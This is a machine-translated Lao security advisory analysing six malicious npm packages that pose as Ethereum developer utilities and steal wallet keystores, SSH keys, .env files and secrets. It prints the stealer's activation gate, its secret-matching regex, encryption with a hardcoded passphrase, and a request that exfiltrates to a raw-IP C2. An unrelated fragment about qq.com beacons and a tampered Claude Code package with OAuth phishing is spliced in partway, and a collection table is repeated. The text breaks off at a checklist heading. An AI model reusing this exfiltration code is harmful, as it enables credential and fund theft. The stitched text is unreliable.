TL; DR
ໃນວັນທີ 6 ພຶດສະພາ 2026, ຜູ້ເຜີຍແຜ່ npm ດຽວ, namikazesarada010206ໄດ້ປ່ອຍແພັກເກດອັນຕະລາຍຫົກຊຸດທີ່ແນໃສ່ລະບົບນິເວດນັກພັດທະນາ Ethereum, Solidity ແລະ DeFi.
ແພັກເກັດຕ່າງໆ, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, ແລະ web3-utils-core, ໃຊ້ຊື່ທີ່ໜ້າເຊື່ອຖືທີ່ຖືກອອກແບບມາໃຫ້ເບິ່ງຄືກັບຫ້ອງສະໝຸດຜູ້ຊ່ວຍສຳລັບເຄື່ອງມື Web3 ທີ່ນິຍົມ.
ຊອງທັງຫົກຊອງມີສ່ວນປະກອບຄືກັນ telemetry.js ໄຟລ໌. ໄຟລ໌ມີຂະໜາດເທົ່າກັນໃນທົ່ວກຸ່ມ, ໂດຍມີ SHA-256:
ມັນແວບໍ່ໄດ້ເຮັດວຽກໃນເວລາຕິດຕັ້ງ. ບໍ່ມີ preinstall or postinstall hook. ແທນທີ່ຈະ, ມັນຈະເປີດໃຊ້ງານເມື່ອແພັກເກດຖືກນຳເຂົ້າຜ່ານ require().
ລາຍລະອຽດນັ້ນມີຄວາມສຳຄັນ.
ການຝັງຈະລໍຖ້າຈົນກວ່ານັກພັດທະນາຈະໃຊ້ແພັກເກດແທ້ໆ. ຫຼັງຈາກນັ້ນ, ມັນຈະກວດສອບວ່າສະຖານີເຮັດວຽກເບິ່ງຄືກັບສະພາບແວດລ້ອມການພັດທະນາ Ethereum / Solidity ແທ້ໆຫຼືບໍ່. ມັນຊອກຫາກະແຈ Alchemy ຫຼື Infura, ກະແຈສ່ວນຕົວ, ຕົວຊ່ວຍຈື່, ກະແຈ deployer, ຫຼືໄດເລກະທໍລີ Foundry ທ້ອງຖິ່ນ.
ຖ້າໂຮດກົງກັນ, ຜູ້ລັກຂະໂມຍຈະເກັບກຳລະຫັດສ່ວນຕົວ SSH, ບ່ອນເກັບລະຫັດກະເປົາເງິນ Foundry / Geth / Brownie, .env* ໄຟລ໌, ແລະຕົວແປສະພາບແວດລ້ອມທີ່ລະອຽດອ່ອນ. ມັນເຂົ້າລະຫັດມັດດ້ວຍ AES-256-GCM ໂດຍໃຊ້ປະໂຫຍກລະຫັດຜ່ານທີ່ຖືກເຂົ້າລະຫັດແລ້ວ ແລະ ກັ່ນຕອງມັນໄປຫາຈຸດສິ້ນສຸດ IPv4 C2 ດິບທີ່ຖືກປິດການໃຊ້ງານການກວດສອບ TLS.
ລະບົບເຕືອນໄພມັລແວຣ໌ (MEW) ຂອງ Xygeni ໄດ້ຢືນຢັນແພັກເກດທັງຫົກອັນວ່າເປັນອັນຕະລາຍ. ຊຸດລາຍງານການລຶບລົງທະບຽນ npm ຍັງຄ້າງຢູ່.
ກຸ່ມ: ຫົກແພັກເກດ, ໜຶ່ງຜູ້ເຜີຍແຜ່
ບັນຊີຜູ້ເຜີຍແຜ່ namikazesarada010206 ຖືກເຊື່ອມໂຍງກັບທີ່ຢູ່ Gmail ທີ່ຍັງບໍ່ໄດ້ຢືນຢັນ namikazesarada010206@gmail.com.
ແຄມເປນດັ່ງກ່າວໄດ້ປະກົດຕົວເປັນສິ່ງພິມມື້ດຽວໃນວັນທີ 6 ພຶດສະພາ 2026. ຊຸດທັງຫົກຊຸດໄດ້ຖືກດັດແປງເປັນ 1.0.0, ບໍ່ມີການເພິ່ງພາອາໄສເວລາແລ່ນ, ແລະ ສົ່ງພຽງແຕ່ສາມໄຟລ໌ເທົ່ານັ້ນ:
package.json index.js telemetry.js ພວກເຂົາຍັງໄດ້ປະກາດບ່ອນເກັບມ້ຽນແຫຼ່ງຂໍ້ມູນດຽວກັນ:
https://github.com/harunosakura030303-maker/evmchain-config ສາມແພັກເກດທຳອິດຖືກສະແກນໂດຍເຄື່ອງສະແກນ MEW ໃນການເຜີຍແຜ່ຄັ້ງທຳອິດ. ສາມແພັກເກດທີ່ເຫຼືອຖືກບັງຄັບໃຫ້ລາຍງານຫຼັງຈາກການທົບທວນໂປຣໄຟລ໌ npm ຂອງຜູ້ເຜີຍແຜ່ໂດຍນັກວິເຄາະ. ເມື່ອ byte-identical ດຽວກັນ telemetry.js ໄດ້ຮັບການຢືນຢັນໃນທົ່ວກຸ່ມ, ພວກມັນຖືກປິດຍ້ອນຄວາມສອດຄ່ອງ.
| Package | Version | ເຜີຍແຜ່ npm | ປີ້ MEW | ຄໍາຕັດສິນ |
|---|---|---|---|---|
| viem-core | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | ເປັນອັນຕະລາຍ |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | ເປັນອັນຕະລາຍ |
| ເຄື່ອງມືຫຼັກແບບ hardhat | 1.0.0 | 2026-05-06 | #51051 | ເປັນອັນຕະລາຍ |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | ເປັນອັນຕະລາຍ, ໂດຍຄວາມສອດຄ່ອງ |
| ອຸປະກອນໂຮງຫລໍ່ | 1.0.0 | 2026-05-06 | #51071 | ເປັນອັນຕະລາຍ, ໂດຍຄວາມສອດຄ່ອງ |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | ເປັນອັນຕະລາຍ, ໂດຍຄວາມສອດຄ່ອງ |
ຍຸດທະສາດການຕັ້ງຊື່ແມ່ນງ່າຍດາຍແຕ່ມີປະສິດທິພາບ.
ແພັກເກດເຫຼົ່ານີ້ບໍ່ໄດ້ປອມແປງຊື່ຕົ້ນນ້ຳທີ່ແນ່ນອນ. ແທນທີ່ຈະ, ພວກມັນໃຊ້ຄຳຕໍ່ທ້າຍ "utility" ທີ່ເປັນໄປໄດ້ເຊັ່ນ: -core, -utils, ແລະ -utils-coreສິ່ງນັ້ນເຮັດໃຫ້ພວກມັນເບິ່ງຄືກັບຫ້ອງສະໝຸດຄູ່ທີ່ນັກພັດທະນາອາດຄາດຫວັງວ່າຈະເຫັນຢູ່ໃກ້ໆກັບເຄື່ອງມື Web3.
| ແພັກເກດທີ່ເປັນອັນຕະລາຍ | ເປົ້າໝາຍທີ່ຖືກຕ້ອງຕາມກົດໝາຍ |
|---|---|
| viem-core | viem, ລູກຄ້າ Ethereum TypeScript ທີ່ໄດ້ຮັບຄວາມນິຍົມ |
| viem-utils-core | ວິມ |
| ເຄື່ອງມືຫຼັກແບບ hardhat | hardhat, ສະພາບແວດລ້ອມການພັດທະນາ Solidity ຫຼັກ |
| evm-utils | namespace ເຄື່ອງມື EVM ທົ່ວໄປ |
| ອຸປະກອນໂຮງຫລໍ່ | ໂຮງຫລໍ່, ລະບົບຕ່ອງໂສ້ເຄື່ອງມື Solidity |
| web3-utils-core | web3-utils, ຕົວຊ່ວຍ Web3.js |
ນີ້ແມ່ນຮູບແບບ "ແພັກເກດເສີມ": ບໍ່ແມ່ນ "ຂ້ອຍເປັນແພັກເກດທີ່ແທ້ຈິງ," ແຕ່ "ຂ້ອຍເບິ່ງຄືວ່າເປັນຜູ້ຊ່ວຍທີ່ສົມເຫດສົມຜົນຢູ່ອ້ອມຮອບແພັກເກດທີ່ແທ້ຈິງ."
ສຳລັບນັກພັດທະນາ DeFi ທີ່ເຄື່ອນໄຫວຢ່າງວ່ອງໄວ, ນັ້ນກໍພຽງພໍທີ່ຈະສ້າງຄວາມສ່ຽງ.
ຈະເກີດຫຍັງຂຶ້ນເມື່ອການຫຸ້ມຫໍ່ຖືກນໍາເຂົ້າ
ລະບົບຕ່ອງໂສ້ການໂຈມຕີມີຂະໜາດນ້ອຍ, ມີເຈດຕະນາ, ແລະ ສຸມໃສ່ສະພາບແວດລ້ອມການພັດທະນາລະຫັດລັບ.
ບໍ່ມີຕະຂໍຕິດຕັ້ງ. ແທນທີ່ຈະ, ແຕ່ລະຊຸດປະກອບມີ index.js ທີ່ສົ່ງອອກໜ້າທີ່ຂອງ stub ແລະຫຼັງຈາກນັ້ນໂຫຼດໂມດູນ telemetry ທີ່ເປັນອັນຕະລາຍ.
require('./telemetry').init(); ນີ້ໝາຍຄວາມວ່າມັນແວຈະເປີດໃຊ້ງານໃນການນຳເຂົ້າຄັ້ງທຳອິດ.
ນັ້ນເປັນປະໂຫຍດໃນການດໍາເນີນງານສໍາລັບຜູ້ໂຈມຕີ. ເຄື່ອງສະແກນ ແລະ sandbox ຈໍານວນຫຼາຍສຸມໃສ່ພຶດຕິກໍາການຕິດຕັ້ງ. ຊຸດນີ້ລໍຖ້າຈົນກວ່າມັນຈະຖືກໃຊ້ໂດຍນັກພັດທະນາ, ສະຄຣິບສ້າງ, ຊຸດການທົດສອບ, ຫຼືເສັ້ນທາງເວລາແລ່ນ.
ປະຕູເປີດໃຊ້ງານ: ໃຊ້ໄດ້ສະເພາະໃນສະຖານີເຮັດວຽກຂອງນັກພັດທະນາ Web3 ຕົວຈິງເທົ່ານັ້ນ
ສ່ວນທີ່ສຳຄັນທີ່ສຸດຂອງການຝັງແມ່ນປະຕູກະຕຸ້ນ.
ມັນແວກວດສອບຕົວແປສະພາບແວດລ້ອມທີ່ພົບເລື້ອຍໃນເຄື່ອງພັດທະນາ Ethereum / Solidity:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); ມັນຍັງກວດສອບວ່າ Foundry ເບິ່ງຄືວ່າຖືກຕິດຕັ້ງແລ້ວຫຼືບໍ່:
fs.existsSync(path.join(os.homedir(), '.foundry')) ຖ້າເງື່ອນໄຂທັງສອງບໍ່ເປັນຈິງ, ຟັງຊັນຈະສົ່ງຄືນ ແລະ ບໍ່ເຮັດຫຍັງເລີຍ.
ສິ່ງນັ້ນເຮັດໃຫ້ແພັກເກດງຽບກວ່າໃນສະພາບແວດລ້ອມການວິເຄາະທົ່ວໄປ. sandbox ທີ່ບໍ່ມີ Foundry, Alchemy keys, Infura keys, private keys, ຫຼື mnemonics ອາດຈະເຫັນການນໍາເຂົ້າທີ່ເບິ່ງຄືວ່າບໍ່ເປັນອັນຕະລາຍ.
ໃນໂຮດທີ່ກົງກັນ, ມັນແວຈະລໍຖ້າ 60 ຫາ 90 ວິນາທີກ່ອນທີ່ຈະເກັບກຳ:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); ຄວາມຊັກຊ້າຫຼຸດຜ່ອນຄວາມສຳພັນທີ່ຊັດເຈນລະຫວ່າງການນຳເຂົ້າ ແລະ ການກັ່ນກອງ. .unref() call ຍັງຊ່ວຍໃຫ້ຂະບວນການໂຮດອອກຈາກປົກກະຕິຖ້າແພັກເກດຖືກນໍາເຂົ້າໃນສະຄຣິບທີ່ມີອາຍຸສັ້ນ.
ນີ້ບໍ່ແມ່ນພຶດຕິກຳການທຸບແລ້ວຈັບທີ່ມີສຽງດັງ. ມັນເປັນຕົວລັກແບບເປົ້າໝາຍທີ່ຖືກອອກແບບມາເພື່ອຫຼີກເວັ້ນການເຮັດວຽກ ເວັ້ນເສຍແຕ່ວ່າສະພາບແວດລ້ອມຂອງນັກພັດທະນາຄຸ້ມຄ່າທີ່ຈະລັກໄດ້.
ສິ່ງທີ່ຜູ້ລັກເກັບກຳ
ເມື່ອປະຕູເປີດໃຊ້ງານຜ່ານໄປ, ມັນແວຈະເກັບກຳຈາກແຫຼ່ງທີ່ສຳຄັນທີ່ສຸດໃນການພັດທະນາ Web3: ລະຫັດສ່ວນຕົວ, ບ່ອນເກັບລະຫັດກະເປົາເງິນ, ຂໍ້ມູນປະຈຳຕົວໃນການນຳໃຊ້, ຄວາມລັບຂອງຄລາວ, ໂທເຄັນ npm, ແລະ ການຕັ້ງຄ່າໂຄງການທ້ອງຖິ່ນ.
| ແຫຼ່ງຂໍ້ມູນ | ສິ່ງທີ່ເກັບກຳ |
|---|---|
| process.env | ຕົວແປໃດກໍໄດ້ທີ່ກົງກັບ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | ໄຟລ໌ທີ່ມີ PRIVATE KEY ຫຼື BEGIN OPENSSH, ລວມທັງເນື້ອໃນໄຟລ໌ເຕັມ |
| ~/.foundry/keystores/* | ໄຟລ໌ keystore ຂອງກະເປົາເງິນ Foundry |
| ~/.ethereum/ບ່ອນເກັບລະຫັດ/* | ໄຟລ໌ທີ່ເກັບລະຫັດກະເປົາເງິນ Geth |
| ~/.brownie/ບັນຊີ/* | ໄຟລ໌ເກັບຮັກສາກະແຈກະເປົາເງິນ Brownie |
| ${cwd}/.env | ເນື້ອໃນໄຟລ໌ເຕັມ |
| ${cwd}/.env.local | ເນື້ອໃນໄຟລ໌ເຕັມ |
| ${cwd}/.env.production | ເນື້ອໃນໄຟລ໌ເຕັມ |
| ${cwd}/.env.ການພັດທະນາ | ເນື້ອໃນໄຟລ໌ເຕັມ |
| ຊື່ໂຮສຕ໌ os.() | ຂໍ້ມູນເມຕາຂອງໂຮສ |
| crypto.randomUUID() | ຕົວລະບຸຜູ້ເຄາະຮ້າຍ/ກອງປະຊຸມ |
| Date.now() | ປະທັບເວລາການເກັບກຳ |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ໂທເຄັນ ATTA ແມ່ນ:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 ພວກເຮົາບໍ່ສາມາດຢືນຢັນໄດ້ວ່າ telemetry ແມ່ນການວິເຄາະຂອງຜູ້ປະກອບການເອງ ຫຼື ເປັນຊ່ອງທາງທີ່ສ້າງລາຍໄດ້ແຍກຕ່າງຫາກ. ໂທເຄັນ ATTA ແມ່ນຄືກັນໃນທັງສອງຕົວຢ່າງທີ່ພວກເຮົາໄດ້ກວດສອບ.
ກຸ່ມ B: heibai
claude.hk ການຫຼອກລວງ OAuth + ການລັກລອບ ANTHROPIC_BASE_URL
ຕົວຢ່າງວັນທີ 1 ເມສາ ແມ່ນສ່ວນໜຶ່ງທີ່ຫຍາບຄາຍກວ່າ ແລະ ກ່ອນໜ້ານີ້ຂອງການໂຄສະນາຫາສຽງ.
heibai:2.1.88-claude.hk-4 ຈັດພີມມາໂດຍ wuguoqiangvip28, ບັນຊີທີ່ສ້າງຂຶ້ນໃນວັນທີ 7 ມິຖຸນາ 2025. ຊຸດດັ່ງກ່າວໄດ້ດັດແປງຕົວມັນເອງຢ່າງຊັດເຈນຕໍ່ກັບສິ່ງທີ່ຖືກຕ້ອງຕາມກົດໝາຍ 2.1.88 ການປ່ອຍຕົວຂອງມະນຸດ.
ມັນບໍ່ໄດ້ລົບກວນກັບ CA-cert MITM. ແທນທີ່ຈະ, ມັນຕົວະຜູ້ໃຊ້ກ່ຽວກັບຈຸດສິ້ນສຸດ OAuth.
ສິ່ງທີ່ເພີ່ມເຂົ້າໄປທີ່ເປັນອັນຕະລາຍນອກເໜືອໄປຈາກແຫຼ່ງທີ່ມາຂອງ Claude Code ທີ່ຮົ່ວໄຫຼອອກມາປະກອບມີ:
| ແຫຼ່ງຂໍ້ມູນ | ສິ່ງທີ່ເກັບກຳ |
|---|---|
| process.env | ຕົວແປໃດກໍໄດ້ທີ່ກົງກັບ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | ໄຟລ໌ທີ່ມີ PRIVATE KEY ຫຼື BEGIN OPENSSH, ລວມທັງເນື້ອໃນໄຟລ໌ເຕັມ |
| ~/.foundry/keystores/* | ໄຟລ໌ keystore ຂອງກະເປົາເງິນ Foundry |
| ~/.ethereum/ບ່ອນເກັບລະຫັດ/* | ໄຟລ໌ທີ່ເກັບລະຫັດກະເປົາເງິນ Geth |
| ~/.brownie/ບັນຊີ/* | ໄຟລ໌ເກັບຮັກສາກະແຈກະເປົາເງິນ Brownie |
| ${cwd}/.env | ເນື້ອໃນໄຟລ໌ເຕັມ |
| ${cwd}/.env.local | ເນື້ອໃນໄຟລ໌ເຕັມ |
| ${cwd}/.env.production | ເນື້ອໃນໄຟລ໌ເຕັມ |
| ${cwd}/.env.ການພັດທະນາ | ເນື້ອໃນໄຟລ໌ເຕັມ |
| ຊື່ໂຮສຕ໌ os.() | ຂໍ້ມູນເມຕາຂອງໂຮສ |
| crypto.randomUUID() | ຕົວລະບຸຜູ້ເຄາະຮ້າຍ/ກອງປະຊຸມ |
| Date.now() | ປະທັບເວລາການເກັບກຳ |
ບັນຊີລາຍຊື່ເປົ້າໝາຍແມ່ນມີຄວາມຊັດເຈນສູງ. ນີ້ບໍ່ແມ່ນການລັກຂະໂມຍໂປຣແກຣມທ່ອງເວັບທົ່ວໄປ ຫຼື ການຂູດຂໍ້ມູນປະຈຳຕົວຢ່າງກວ້າງຂວາງ. ມັນແນໃສ່ນັກພັດທະນາຜູ້ທີ່ສ້າງ, ທົດສອບ, ນຳໃຊ້ ຫຼື ດຳເນີນງານແອັບພລິເຄຊັນ Ethereum.
ການລວມເອົາບ່ອນເກັບລະຫັດ Foundry, Geth, ແລະ Brownie ແມ່ນມີຄວາມສຳຄັນເປັນພິເສດ. ໄຟລ໌ເຫຼົ່ານີ້ສາມາດສະແດງເຖິງການເຂົ້າເຖິງກະເປົາເງິນ ຫຼື ຕົວຕົນການນຳໃຊ້ໂດຍກົງ. ຖ້າຜູ້ໂຈມຕີສາມາດຈັບຄູ່ພວກມັນກັບລະຫັດຜ່ານ, ຕົວຊ່ວຍຈື່ຈຳ, ຫຼື ຄວາມລັບຂອງສະພາບແວດລ້ອມ, ພວກເຂົາອາດຈະສາມາດຍ້າຍເງິນ, ປອມຕົວເປັນຜູ້ນຳໃຊ້, ຫຼື ປະນີປະນອມການດຳເນີນງານສັນຍາສະຫຼາດໄດ້.
ການເຂົ້າລະຫັດກ່ອນການກັ່ນຕອງ
ມັນແວຣ໌ຈະເຂົ້າລະຫັດຂໍ້ມູນທີ່ເກັບກຳໄດ້ກ່ອນທີ່ຈະສົ່ງມັນອອກໄປ.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); ວະລີລະຫັດຜ່ານທີ່ຖືກເຂົ້າລະຫັດແມ່ນ:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d payload ສຸດທ້າຍຖືກຫໍ່ເປັນ JSON:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} ການເຂົ້າລະຫັດບໍ່ໄດ້ເຮັດໃຫ້ມັລແວຣ໌ກ້າວໜ້າຂຶ້ນດ້ວຍຕົວມັນເອງ. ເຖິງຢ່າງໃດກໍ່ຕາມ, ມັນເຮັດໃຫ້ການກວດສອບເຄືອຂ່າຍຍາກຂຶ້ນ. ຜູ້ຖືກປ້ອງກັນທີ່ເຝົ້າເບິ່ງການອອກໄປຈະເຫັນ payload JSON, ແຕ່ບໍ່ແມ່ນກະແຈທີ່ຖືກລັກ, ໄຟລ໌ກະເປົາເງິນ, ຫຼື .env ເນື້ອຫາໂດຍບໍ່ມີລະຫັດຜ່ານທີ່ຖືກເຂົ້າລະຫັດ ແລະ ເຫດຜົນຂອງການຖອດລະຫັດ.
ການກັ່ນຕອງໄປຫາ Raw IPv4 C2
ເສັ້ນທາງການກັ່ນຕອງແມ່ນຖືກລະຫັດໄວ້ແລ້ວ:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); ມັນແວສົ່ງຂໍ້ມູນໄປຫາ:
https://76.13.37.80:8443/api/v1/telemetry ສອງລາຍລະອຽດທີ່ໂດດເດັ່ນ.
ຫນ້າທໍາອິດ, C2 ແມ່ນທີ່ຢູ່ IPv4 ດິບແທນທີ່ຈະເປັນໂດເມນ. ສິ່ງນັ້ນຊ່ວຍລົບລ້າງຄວາມຕ້ອງການໃນການລົງທະບຽນໂດເມນ ແລະ ຫຼີກລ່ຽງການກວດຈັບທີ່ອີງໃສ່ໂດເມນບາງຢ່າງ.
ອັນທີສອງ, ການຢັ້ງຢືນ TLS ຖືກປິດໃຊ້ງານດ້ວຍ:
rejectUnauthorized: false ສິ່ງນັ້ນຊ່ວຍໃຫ້ມັນແວຍອມຮັບໃບຢັ້ງຢືນໃດໆ, ລວມທັງໃບຢັ້ງຢືນທີ່ເຊັນດ້ວຍຕົນເອງ. ເວົ້າອີກຢ່າງໜຶ່ງ, ຜູ້ໂຈມຕີໄດ້ຮັບການສົ່ງຂໍ້ມູນທີ່ຖືກເຂົ້າລະຫັດໂດຍບໍ່ຕ້ອງມີໃບຢັ້ງຢືນສາທາລະນະທີ່ຖືກຕ້ອງ.
ບໍ່ມີເຫດຜົນການລອງໃໝ່ ແລະ ບໍ່ມີໂຮສສຳຮອງ. ຄວາມຜິດພາດຈະຖືກກືນກິນຢ່າງງຽບໆ. ສິ່ງນີ້ເຮັດໃຫ້ແພັກເກດງຽບຖ້າ C2 ອອບໄລນ໌ ຫຼື ບໍ່ສາມາດຕິດຕໍ່ໄດ້.
ເປັນຫຍັງແຄມເປນນີ້ຈຶ່ງສຳຄັນ
ແພັກເກດ npm ທີ່ເປັນອັນຕະລາຍສ່ວນໃຫຍ່ທີ່ແນໃສ່ນັກພັດທະນາທີ່ໄລ່ຕາມຂໍ້ມູນປະຈຳຕົວທີ່ກວ້າງຂວາງ: ໂທເຄັນ npm, ລະຫັດ AWS, ໂທເຄັນ GitHub ຫຼື .npmrc ໄຟລ໌.
ແຄມເປນນີ້ເຮັດໃຫ້ເປົ້າໝາຍແຄບລົງ.
ມັນຊອກຫາສັນຍານທີ່ສະແດງໃຫ້ເຫັນວ່າເຄື່ອງດັ່ງກ່າວເປັນຂອງຜູ້ພັດທະນາ Ethereum ຫຼື Solidity. ຫຼັງຈາກນັ້ນ, ມັນຈະດຶງເອົາຊັບສິນທີ່ສຳຄັນໃນສະພາບແວດລ້ອມນັ້ນຢ່າງແນ່ນອນ: ບ່ອນເກັບລະຫັດກະເປົາເງິນ, ລະຫັດສ່ວນຕົວ, ຕົວຊ່ວຍຈື່ຈຳ, ລະຫັດຜູ້ນຳໃຊ້, .env ໄຟລ໌, ແລະກະແຈ SSH.
ນັ້ນເຮັດໃຫ້ແຄມເປນເປັນອັນຕະລາຍຫຼາຍສຳລັບທີມງານ Web3 ກ່ວາຕົວລັກ npm ທົ່ວໄປ.
ການຕິດເຊື້ອທີ່ປະສົບຜົນສຳເລັດອາດຈະເຮັດໃຫ້ເກີດ:
- ກະເປົາເງິນສຳລັບການນຳໃຊ້
- ລະຫັດຜູ້ເບິ່ງແຍງລະບົບສັນຍາອັດສະລິຍະ
- ລະຫັດຜູ້ໃຫ້ບໍລິການ RPC
- ຂໍ້ມູນປະຈຳຕົວການນຳໃຊ້ຄລາວ
- ໂທເຄັນການເຜີຍແຜ່ npm
- ການເຂົ້າເຖິງ SSH ຕໍ່ກັບນັກພັດທະນາ ຫຼື ໂຄງສ້າງພື້ນຖານ
- ຄວາມລັບຂອງໂຄງການຖືກເກັບໄວ້ໃນ
.envໄຟ - ບ່ອນເກັບລະຫັດກະເປົາເງິນສຳລັບ Foundry, Geth, ຫຼື Brownie
ຊື່ແພັກເກດຍັງສະແດງໃຫ້ເຫັນເຖິງວິສະວະກຳສັງຄົມທີ່ຊັດເຈນ. ພວກມັນແນໃສ່ລະບົບນິເວດຂອງນັກພັດທະນາ Web3 ຜ່ານຊື່ເຄື່ອງມືທີ່ຄຸ້ນເຄີຍ: viem, hardhat, foundry, evm, ແລະ web3.
ນັກສະແດງບໍ່ຈຳເປັນຕ້ອງປະນີປະນອມໂຄງການຕົວຈິງ. ພວກເຂົາພຽງແຕ່ຕ້ອງການນັກພັດທະນາເພື່ອຕິດຕັ້ງສິ່ງທີ່ເບິ່ງຄືວ່າເປັນແພັກເກດທີ່ສົມເຫດສົມຜົນ.
ຕົວຊີ້ວັດຂອງການປະນີປະນອມ ແລະ ການກວດຈັບ
| ແພັກເກດ ແລະ ຜູ້ເຜີຍແຜ່ | |
|---|---|
| ພາກສະຫນາມ | ມູນຄ່າ |
| ຜູ້ເຜີຍແຜ່ npm | namikazesarada010206 |
| ອີເມວຂອງຜູ້ເຜີຍແຜ່ | namikazesarada010206@gmail.com |
| ອີເມລ໌ຢັ້ງຢືນແລ້ວ | No |
| SCM ຢືນຢັນ | No |
| ຄະແນນຊື່ສຽງ | 1.0 |
| ການຫຸ້ມຫໍ່ | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| ສະບັບ | ທັງຫມົດ 1.0.0 |
| ບ່ອນເກັບຂໍ້ມູນແຫຼ່ງຂໍ້ມູນ | https://github.com/harunosakura030303-maker/evmchain-config |
| ຢືນຢັນແລ້ວວ່າເປັນອັນຕະລາຍ | ແພັກເກດທັງຫົກອັນ |
| ເຄືອຂ່າຍ | |
|---|---|
| ປະເພດ | ມູນຄ່າ |
| ຈຸດສິ້ນສຸດ C2 | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| ພອດ C2 | 8443/tcp |
| ພຶດຕິກຳຂອງ TLS | ປະຕິເສດບໍ່ໄດ້ຮັບອະນຸຍາດ: false |
| ຮູບແບບການໂຫຼດ | {"v":2,"iv": , "ດ": ,"ທ": } |
| ໄຟລ໌ ແລະ ແຮຊ | |
|---|---|
| ປະເພດ | ມູນຄ່າ |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| ຮູບແບບການຫຸ້ມຫໍ່ | package.json, index.js, telemetry.js |
| ຈຳນວນໄຟລ໌ | 3 |
| ຂະໜາດທັງໝົດປະມານ | 3.4 KB |
ສັນຍານການເປີດໃຊ້ງານ
ມັນແວກວດສອບຕົວແປສະພາບແວດລ້ອມເຫຼົ່ານີ້:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY ມັນຍັງກວດສອບ:
~/.foundry/ ເສັ້ນທາງໂຮດເປົ້າໝາຍ
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development ການເກັບກຳແບບປົກກະຕິ
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ບັນທຶກການກວດຈັບ
ກົດລະບຽບຫຼາຍຢ່າງຈັບເອົາແຄມເປນນີ້ໂດຍບໍ່ຈໍາເປັນຕ້ອງມີການວິເຄາະພຶດຕິກໍາຢ່າງຄົບຖ້ວນ.
ກ່ອນອື່ນໝົດ, ໃຫ້ສະແກນໄຟລ໌ລັອກເພື່ອຊອກຫາຊື່ແພັກເກດທີ່ເປັນອັນຕະລາຍຫົກຊື່:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core ການແຂ່ງຂັນໃດໆໃນ package-lock.json, yarn.lock, pnpm-lock.yaml, ຫຼື node_modules ປະຫວັດສາດຄວນຖືກຖືວ່າເປັນເຫດການທີ່ຮ້າຍແຮງ.
ອັນທີສອງ, ຕິດຕາມກວດກາຂະບວນການ Node.js ທີ່ອ່ານເສັ້ນທາງ keystore ຂອງກະເປົາເງິນ:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ ນີ້ບໍ່ຄ່ອຍຈະເປັນພຶດຕິກຳທີ່ຖືກຕ້ອງຕາມກົດໝາຍສຳລັບແພັກເກດທີ່ນຳເຂົ້າເປັນການເພິ່ງພາອາໄສຂອງຜູ້ຊ່ວຍ. ມັນມີຄວາມໜ້າສົງໄສໂດຍສະເພາະເມື່ອຕິດຕາມດ້ວຍກິດຈະກຳເຄືອຂ່າຍທີ່ສົ່ງອອກ.
ອັນທີສາມ, ບລັອກ ຫຼື ແຈ້ງເຕືອນກ່ຽວກັບການເຊື່ອມຕໍ່ HTTPS ເພື່ອ:
76.13.37.80:8443 ໂດຍສະເພາະເມື່ອເສັ້ນທາງການຮ້ອງຂໍແມ່ນ:
/api/v1/telemetry ອັນທີສີ່, ຄົ້ນຫາແພັກເກດ npm ທີ່ລວມເອົາຄຸນລັກສະນະເຫຼົ່ານີ້:
- ຜູ້ເຜີຍແຜ່ໃໝ່ ຫຼື ຜູ້ເຜີຍແຜ່ທີ່ມີຊື່ສຽງຕ່ຳ
- ບັນຊີ Gmail ທີ່ຍັງບໍ່ໄດ້ຢືນຢັນ
- ຊື່ແພັກເກດທີ່ຢູ່ຕິດກັບ Web3
- ບໍ່ມີປະຫວັດການເກັບຮັກສາທີ່ມີຄວາມໝາຍ
- ຮູບແບບແພັກເກດຂະໜາດນ້ອຍ
index.jsທີ່ໂຫຼດ telemetry ຫຼືໄຟລ໌ຊ່ວຍເຫຼືອ- ບໍ່ມີການເພິ່ງພາອາໄສເວລາແລ່ນ
- ການເກັບກຳຕົວແປສະພາບແວດລ້ອມທີ່ລະອຽດອ່ອນ
- ການເຂົ້າເຖິງບ່ອນເກັບກະແຈ Wallet
ຮູບແບບນີ້ມີປະໂຫຍດຫຼາຍກວ່າ IOC ດຽວ ເພາະວ່າແພັກເກດຕໍ່ໄປອາດຈະປ່ຽນທີ່ຢູ່ IP ແຕ່ຮັກສາເຫດຜົນການກຳນົດເປົ້າໝາຍຄືເກົ່າ.
ລາຍການກວດສອບການຕອບສະໜອງຕໍ່ການປະນີປະນອມ
